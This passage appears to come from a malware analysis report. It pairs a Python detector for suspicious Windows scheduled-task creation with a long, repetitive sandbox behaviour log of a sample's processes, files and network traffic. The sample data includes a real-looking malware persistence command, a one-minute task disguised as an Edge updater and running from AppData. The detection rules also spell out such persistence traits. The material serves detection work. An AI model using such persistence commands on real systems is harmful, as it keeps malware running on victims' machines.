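USER_WRITABLE = ("\\appdata\\", "\\programdata\\", "\\temp\\", "\\users\\public\\")
# Assumption: task-name prefixes used by genuine Microsoft updaters that malware likes to copy.
LOOKALIKE_PREFIXES = ("microsoftedgeupdatetaskmachine",)
SHORT_INTERVAL_MINUTES = 5   # assumption: maintenance jobs do not repeat this often

def tokenize(cmdline):
    """Split a Windows command line into tokens, keeping "quoted strings" together."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]

def parse_schtasks(cmdline):
    """Turn `schtasks /Create ...` into {FLAG: value}; value-less flags map to True.
    Returns None for anything that is not a schtasks task creation."""
    toks = tokenize(cmdline)
    if not toks or toks[0].lower().split("\\")[-1] not in ("schtasks", "schtasks.exe"):
        return None
    args, i = {}, 1
    while i < len(toks):
        tok = toks[i]
        if tok.startswith("/"):
            key = tok[1:].upper()
            if i + 1 < len(toks) and not toks[i + 1].startswith("/"):
                args[key] = toks[i + 1]
                i += 2
            else:
                args[key] = True
                i += 1
        else:
            i += 1
    return args if "CREATE" in args else None

def interval_minutes(args):
    """Repeat interval implied by /SC and /MO, or None for schedules that do not repeat."""
    sc, mo = str(args.get("SC", "")).upper(), str(args.get("MO", "1"))
    n = int(mo) if mo.isdigit() else 1
    return {"MINUTE": n, "HOURLY": 60 * n}.get(sc)

def score_task(args):
    """Reasons a task creation looks like malware persistence (empty list means nothing matched)."""
    findings = []
    name, action = str(args.get("TN", "")), str(args.get("TR", ""))
    mins = interval_minutes(args)
    if mins is not None and mins <= SHORT_INTERVAL_MINUTES:
        findings.append(f"re-runs every {mins} minute(s): a watchdog interval, not a maintenance schedule")
    if any(p in action.lower() for p in USER_WRITABLE):
        findings.append(f"action runs from a user-writable path: {action}")
    if name.lower().startswith(LOOKALIKE_PREFIXES) and "\\program files" not in action.lower():
        findings.append(f"task name imitates a Microsoft updater but does not run from Program Files: {name}")
    return findings

def hunt(cmdlines):
    """Map task name -> findings for every suspicious `schtasks /Create` among process command lines."""
    hits = {}
    for line in cmdlines:
        args = parse_schtasks(line)
        if args:
            reasons = score_task(args)
            if reasons:
                hits[str(args.get("TN", "?"))] = reasons
    return hits

SAMPLE_CMDLINES = [
    # From this report: one-minute repeat, AppData binary, name copied from the Edge updater tasks.
    r'schtasks /Create /F /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineUACC" '
    r'/TR "C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe"',
    # Constructed benign task: nightly job installed under Program Files.
    r'schtasks /Create /SC DAILY /ST 02:00 /TN "Acme\NightlyBackup" /TR "C:\Program Files\Acme\backup.exe"',
    # Constructed: logon persistence from Temp, generic name.
    r'C:\Windows\System32\schtasks.exe /Create /SC ONLOGON /TN Updater /TR C:\Users\user\AppData\Local\Temp\u.exe',
    # Constructed: a query, not a creation; ignored.
    r'schtasks /Query /FO CSV /V',
]

if __name__ == "__main__":
    for task, reasons in hunt(SAMPLE_CMDLINES).items():
        print(task)
        for reason in reasons:
            print("   -", reason)
```

The same rules transfer directly to the `TaskName`, `Task To Run` and schedule columns of `schtasks /Query /FO CSV /V` output, or to `Get-ScheduledTask` objects, for a host that is already infected; the command-line form is shown because that is the event an EDR sees at the moment of installation.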

                      Hooking and other Techniques for Hiding and Protection

                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 3000
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 3000
                      Source: unknownNetwork traffic detected: HTTP traffic on port 3000 -> 49719
                      Source: unknownNetwork traffic detected: HTTP traffic on port 3000 -> 49718
                      Source: C:\Users\user\Desktop\Launcher.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\tasklist.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
